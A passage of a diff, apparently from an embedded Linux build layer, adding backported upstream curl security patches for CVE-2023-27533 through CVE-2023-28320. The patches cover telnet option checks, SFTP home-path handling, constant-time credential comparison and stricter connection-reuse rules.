+Reported-by: Harry Sintonen
+Closes #10728
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
+CVE: CVE-2023-27533
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/telnet.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
+ }
+ }
+
++static bool str_is_nonascii(const char *str)
++{
++ size_t len = strlen(str);
++ while(len--) {
++ if(*str & 0x80)
++ return TRUE;
++ str++;
++ }
++ return FALSE;
++}
++
+ static CURLcode check_telnet_options(struct connectdata *conn)
+ {
+ struct curl_slist *head;
+@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
+ /* Add the user name as an environment variable if it
+ was given on the command line */
+ if(conn->bits.user_passwd) {
++ if(str_is_nonascii(data->conn->user))
++ return CURLE_BAD_FUNCTION_ARGUMENT;
+ msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
+ beg = curl_slist_append(tn->telnet_vars, option_arg);
+ if(!beg) {
+@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
+ if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
+ option_keyword, option_arg) == 2) {
+
++ if(str_is_nonascii(option_arg))
++ continue;
++
+ /* Terminal type */
+ if(strcasecompare(option_keyword, "TTYPE")) {
+ strncpy(tn->subopt_ttype, option_arg, 31);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
+From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
+From: Eric Vigeant <evigeant@gmail.com>
+Date: Wed, 2 Nov 2022 11:47:09 -0400
+Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
+
+When using SFTP and a path relative to the user home, do not add a
+trailing '/' to the user home dir if it already ends with one.
+
+Closes #9844
+
+CVE: CVE-2023-27534
+Note:
+- The upstream patch for CVE-2023-27534 does three things:
+1) creates new path with dynbuf(dynamic buffer)
+2) solves the tilde error which causes CVE-2023-27534
+3) modifies the below added functionality to not add a trailing "/" to the user home dir if it already ends with one with dynbuf.
+- dynbuf functionalities are added in curl in later versions and are not essential to fix the vulnerability but does add extra feature in later versions.
+- This patch completes the 3rd task of the patch which was implemented without using dynbuf
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index f429634..40b92ee 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ /* It is referenced to the home directory, so strip the
+ leading '/' */
+ memcpy(real_path, homedir, homelen);
+- real_path[homelen] = '/';
+- real_path[homelen + 1] = '\0';
++ /* Only add a trailing '/' if homedir does not end with one */
++ if(homelen == 0 || real_path[homelen - 1] != '/') {
++ real_path[homelen] = '/';
++ homelen++;
++ real_path[homelen] = '\0';
++ }
+ if(working_path_len > 3) {
+- memcpy(real_path + homelen + 1, working_path + 3,
++ memcpy(real_path + homelen, working_path + 3,
+ 1 + working_path_len -3);
+ }
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
+From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 16:22:11 +0100
+Subject: [PATCH] curl_path: create the new path with dynbuf
+
+Closes #10729
+
+CVE: CVE-2023-27534
+Note: This patch is needed to backport CVE-2023-27534
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index 40b92ee..598c5dd 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ memcpy(real_path, working_path, 1 + working_path_len);
+ }
+ else if(conn->handler->protocol & CURLPROTO_SFTP) {
+- if((working_path_len > 1) && (working_path[1] == '~')) {
++ if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
+ size_t homelen = strlen(homedir);
+ real_path = malloc(homelen + working_path_len + 1);
+ if(real_path == NULL) {
+--
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
+From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 6 Oct 2022 00:49:10 +0200
+Subject: [PATCH] strcase: add and use Curl_timestrcmp
+
+This is a strcmp() alternative function for comparing "secrets",
+designed to take the same time no matter the content to not leak
+match/non-match info to observers based on how fast it is.
+
+The time this function takes is only a function of the shortest input
+string.
+
+Reported-by: Trail of Bits
+
+Closes #9658
+
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/netrc.c | 6 +++---
+ lib/strcase.c | 22 ++++++++++++++++++++++
+ lib/strcase.h | 1 +
+ lib/url.c | 33 +++++++++++++--------------------
+ lib/vauth/digest_sspi.c | 4 ++--
+ lib/vtls/vtls.c | 21 ++++++++++++++++++++-
+ 6 files changed, 61 insertions(+), 26 deletions(-)
+
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 9323913..fe3fd1e 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
+ /* we are now parsing sub-keywords concerning "our" host */
+ if(state_login) {
+ if(specific_login) {
+- state_our_login = strcasecompare(login, tok);
++ state_our_login = !Curl_timestrcmp(login, tok);
+ }
+- else if(!login || strcmp(login, tok)) {
++ else if(!login || Curl_timestrcmp(login, tok)) {
+ if(login_alloc) {
+ free(login);
+ login_alloc = FALSE;
+@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
+ }
+ else if(state_password) {
+ if((state_our_login || !specific_login)
+- && (!password || strcmp(password, tok))) {
++ && (!password || Curl_timestrcmp(password, tok))) {
+ if(password_alloc) {
+ free(password);
+ password_alloc = FALSE;
+diff --git a/lib/strcase.c b/lib/strcase.c
+index 70bf21c..ec776b3 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
+ return !a && !b;
+ }
+
++/*
++ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
++ * function spends is a function of the shortest string, not of the contents.
++ */
++int Curl_timestrcmp(const char *a, const char *b)
++{
++ int match = 0;
++ int i = 0;
++
++ if(a && b) {
++ while(1) {
++ match |= a[i]^b[i];
++ if(!a[i] || !b[i])
++ break;
++ i++;
++ }
++ }
++ else
++ return a || b;
++ return match;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index 8929a53..8077108 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
+ bool Curl_safecmp(char *a, char *b);
++int Curl_timestrcmp(const char *first, const char *second);
+
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9f14a7b..dfbde3b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
+ /* the user information is case-sensitive
+ or at least it is not defined as case-insensitive
+ see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
+- if((data->user == NULL) != (needle->user == NULL))
+- return FALSE;
+- /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->user &&
+- needle->user &&
+- strcmp(data->user, needle->user) != 0)
+- return FALSE;
+- if((data->passwd == NULL) != (needle->passwd == NULL))
+- return FALSE;
++
+ /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->passwd &&
+- needle->passwd &&
+- strcmp(data->passwd, needle->passwd) != 0)
++ if(Curl_timestrcmp(data->user, needle->user) ||
++ Curl_timestrcmp(data->passwd, needle->passwd))
+ return FALSE;
+ return TRUE;
+ }
+@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd) ||
+- !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
+- !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd) ||
++ Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
++ Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
+ possible. (Especially we must not reuse the same connection if
+ partway through a handshake!) */
+ if(wantNTLMhttp) {
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd)) {
+
+ /* we prefer a credential match, but this is at least a connection
+ that can be reused and "upgraded" to NTLM */
+@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!check->http_proxy.user || !check->http_proxy.passwd)
+ continue;
+
+- if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
+- strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
++ if(Curl_timestrcmp(needle->http_proxy.user,
++ check->http_proxy.user) ||
++ Curl_timestrcmp(needle->http_proxy.passwd,
++ check->http_proxy.passwd))
+ continue;
+ }
+ else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
+diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
+index a109056..3986386 100644
+--- a/lib/vauth/digest_sspi.c
++++ b/lib/vauth/digest_sspi.c
+@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
+ has changed then delete that context. */
+ if((userp && !digest->user) || (!userp && digest->user) ||
+ (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
+- (userp && digest->user && strcmp(userp, digest->user)) ||
+- (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
++ (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
++ (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
+ if(digest->http_context) {
+ s_pSecFn->DeleteSecurityContext(digest->http_context);
+ Curl_safefree(digest->http_context);
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e8cb70f..70a9391 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ Curl_safecmp(data->issuercert, needle->issuercert) &&
+ Curl_safecmp(data->clientcert, needle->clientcert) &&
+ Curl_safecmp(data->random_file, needle->random_file) &&
+- Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++#ifdef USE_TLS_SRP
++ !Curl_timestrcmp(data->username, needle->username) &&
++ !Curl_timestrcmp(data->password, needle->password) &&
++ (data->authtype == needle->authtype) &&
++#endif
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
++ Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+ return TRUE;
+
+@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ dest->verifyhost = source->verifyhost;
+ dest->verifystatus = source->verifystatus;
+ dest->sessionid = source->sessionid;
++#ifdef USE_TLS_SRP
++ dest->authtype = source->authtype;
++#endif
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
+@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ CLONE_STRING(cipher_list);
+ CLONE_STRING(cipher_list13);
+ CLONE_STRING(pinned_key);
++ CLONE_STRING(CRLfile);
++#ifdef USE_TLS_SRP
++ CLONE_STRING(username);
++ CLONE_STRING(password);
++#endif
+
+ return TRUE;
+ }
+@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ Curl_safefree(sslc->cipher_list);
+ Curl_safefree(sslc->cipher_list13);
+ Curl_safefree(sslc->pinned_key);
++ Curl_safefree(sslc->CRLfile);
++#ifdef USE_TLS_SRP
++ Curl_safefree(sslc->username);
++ Curl_safefree(sslc->password);
++#endif
+ }
+
+ #ifdef USE_SSL
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
+From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 17:47:06 +0100
+Subject: [PATCH] ftp: add more conditions for connection reuse
+
+Reported-by: Harry Sintonen
+Closes #10730
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
+CVE: CVE-2023-27535
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/ftp.c | 30 ++++++++++++++++++++++++++++--
+ lib/ftp.h | 5 +++++
+ lib/setopt.c | 2 +-
+ lib/url.c | 16 +++++++++++++++-
+ lib/urldata.h | 4 ++--
+ 5 files changed, 51 insertions(+), 6 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 31a34e8..7a82a74 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
+ }
+
+ freedirs(ftpc);
++ free(ftpc->account);
++ ftpc->account = NULL;
++ free(ftpc->alternative_to_user);
++ ftpc->alternative_to_user = NULL;
+ free(ftpc->prevpath);
+ ftpc->prevpath = NULL;
+ free(ftpc->server_os);
+@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ struct Curl_easy *data = conn->data;
+ char *type;
+ struct FTP *ftp;
++ struct ftp_conn *ftpc = &conn->proto.ftpc;
+
+- conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
++ ftp = calloc(sizeof(struct FTP), 1);
+ if(NULL == ftp)
+ return CURLE_OUT_OF_MEMORY;
+
++ /* clone connection related data that is FTP specific */
++ if(data->set.str[STRING_FTP_ACCOUNT]) {
++ ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
++ if(!ftpc->account) {
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
++ ftpc->alternative_to_user =
++ strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
++ if(!ftpc->alternative_to_user) {
++ Curl_safefree(ftpc->account);
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ conn->data->req.protop = ftp;
++
+ ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
+
+ /* FTP URLs support an extension like ";type=<typecode>" that
+@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ /* get some initial data into the ftp struct */
+ ftp->transfer = FTPTRANSFER_BODY;
+ ftp->downloadsize = 0;
+- conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
++ ftpc->known_filesize = -1; /* unknown size for now */
++ ftpc->use_ssl = data->set.use_ssl;
++ ftpc->ccc = data->set.ftp_ccc;
+
+ return CURLE_OK;
+ }
+diff --git a/lib/ftp.h b/lib/ftp.h
+index 984347f..163dcb3 100644
+--- a/lib/ftp.h
++++ b/lib/ftp.h
+@@ -116,6 +116,8 @@ struct FTP {
+ struct */
+ struct ftp_conn {
+ struct pingpong pp;
++ char *account;
++ char *alternative_to_user;
+ char *entrypath; /* the PWD reply when we logged on */
+ char **dirs; /* realloc()ed array for path components */
+ int dirdepth; /* number of entries used in the 'dirs' array */
+@@ -141,6 +143,9 @@ struct ftp_conn {
+ ftpstate state; /* always use ftp.c:state() to change state! */
+ ftpstate state_saved; /* transfer type saved to be reloaded after
+ data connection is established */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
++ unsigned char ccc; /* ccc level for this connection */
+ curl_off_t retr_size_saved; /* Size of retrieved file saved */
+ char *server_os; /* The target server operating system. */
+ curl_off_t known_filesize; /* file size is different from -1, if wildcard
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4d96f6b..a91bb70 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ arg = va_arg(param, long);
+ if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+- data->set.use_ssl = (curl_usessl)arg;
++ data->set.use_ssl = (unsigned char)arg;
+ break;
+
+ case CURLOPT_SSL_OPTIONS:
+diff --git a/lib/url.c b/lib/url.c
+index dfbde3b..f84375c 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
++#ifdef USE_SSH
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
++#endif
++#ifndef CURL_DISABLE_FTP
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
++ /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
++ if(Curl_timestrcmp(needle->proto.ftpc.account,
++ check->proto.ftpc.account) ||
++ Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
++ check->proto.ftpc.alternative_to_user) ||
++ (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
++ (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
++ continue;
++ }
++#endif
+
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 168f874..51b793b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1730,8 +1730,6 @@ struct UserDefined {
+ void *ssh_keyfunc_userp; /* custom pointer to callback */
+ enum CURL_NETRC_OPTION
+ use_netrc; /* defined in include/curl.h */
+- curl_usessl use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
+- IMAP or POP3 or others! */
+ long new_file_perms; /* Permissions to use when creating remote files */
+ long new_directory_perms; /* Permissions to use when creating remote dirs */
+ long ssh_auth_types; /* allowed SSH auth types */
+@@ -1851,6 +1849,8 @@ struct UserDefined {
+ BIT(http09_allowed); /* allow HTTP/0.9 responses */
+ BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
+ recipients */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
+ };
+
+ struct Names {
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
+From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 09:22:43 +0100
+Subject: [PATCH] url: only reuse connections with same GSS delegation
+
+Reported-by: Harry Sintonen
+Closes #10731
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
+CVE: CVE-2023-27536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/url.c | 6 ++++++
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+)
+
+diff --git a/lib/url.c b/lib/url.c
+index f84375c..87f4eb0 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ /* GSS delegation differences do not actually affect every connection
++ and auth method, but this check takes precaution before efficiency */
++ if(needle->gssapi_delegation != check->gssapi_delegation)
++ continue;
++
+ #ifdef USE_SSH
+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
+ conn->fclosesocket = data->set.fclosesocket;
+ conn->closesocket_client = data->set.closesocket_client;
+ conn->lastused = Curl_now(); /* used now */
++ conn->gssapi_delegation = data->set.gssapi_delegation;
+
+ return conn;
+ error:
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 51b793b..b8a611b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1118,6 +1118,7 @@ struct connectdata {
+ handle */
+ BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
+ accept() */
++ long gssapi_delegation; /* inherited from set.gssapi_delegation */
+ };
+
+ /* The end of connectdata. */
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
+From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 08:22:51 +0100
+Subject: [PATCH] url: fix the SSH connection reuse check
+
+Reported-by: Harry Sintonen
+Closes #10735
+
+CVE: CVE-2023-27538
+Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/url.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 8da0245..9f14a7b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
+From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 16 May 2023 23:40:42 +0200
+Subject: [PATCH] hostip: include easy_lock.h before using
+ GLOBAL_INIT_IS_THREADSAFE
+
+Since that header file is the only place that define can be defined.
+
+Reported-by: Marc Deslauriers
+
+Follow-up to 13718030ad4b3209
+
+Closes #11121
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
+ lib/hostip.c | 10 ++---
+ lib/hostip.h | 9 ----
+ 3 files changed, 113 insertions(+), 15 deletions(-)
+ create mode 100644 lib/easy_lock.h
+
+diff --git a/lib/easy_lock.h b/lib/easy_lock.h
+new file mode 100644
+index 0000000..6399a39
+--- /dev/null
++++ b/lib/easy_lock.h
+@@ -0,0 +1,109 @@
++#ifndef HEADER_CURL_EASY_LOCK_H
++#define HEADER_CURL_EASY_LOCK_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#define GLOBAL_INIT_IS_THREADSAFE
++
++#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
++
++#ifdef __MINGW32__
++#ifndef __MINGW64_VERSION_MAJOR
++#if (__MINGW32_MAJOR_VERSION < 5) || \
++ (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
++/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
++typedef PVOID SRWLOCK, *PSRWLOCK;
++#endif
++#endif
++#ifndef SRWLOCK_INIT
++#define SRWLOCK_INIT NULL
++#endif
++#endif /* __MINGW32__ */
++
++#define curl_simple_lock SRWLOCK
++#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
++
++#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
++#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
++
++#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
++#include <stdatomic.h>
++#if defined(HAVE_SCHED_YIELD)
++#include <sched.h>
++#endif
++
++#define curl_simple_lock atomic_int
++#define CURL_SIMPLE_LOCK_INIT 0
++
++/* a clang-thing */
++#ifndef __has_builtin
++#define __has_builtin(x) 0
++#endif
++
++#ifndef __INTEL_COMPILER
++/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
++ __has_builtin() function, so override it. */
++
++/* if GCC on i386/x86_64 or if the built-in is present */
++#if ( (defined(__GNUC__) && !defined(__clang__)) && \
++ (defined(__i386__) || defined(__x86_64__))) || \
++ __has_builtin(__builtin_ia32_pause)
++#define HAVE_BUILTIN_IA32_PAUSE
++#endif
++
++#endif
++
++static inline void curl_simple_lock_lock(curl_simple_lock *lock)
++{
++ for(;;) {
++ if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
++ break;
++ /* Reduce cache coherency traffic */
++ while(atomic_load_explicit(lock, memory_order_relaxed)) {
++ /* Reduce load (not mandatory) */
++#ifdef HAVE_BUILTIN_IA32_PAUSE
++ __builtin_ia32_pause();
++#elif defined(__aarch64__)
++ __asm__ volatile("yield" ::: "memory");
++#elif defined(HAVE_SCHED_YIELD)
++ sched_yield();
++#endif
++ }
++ }
++}
++
++static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
++{
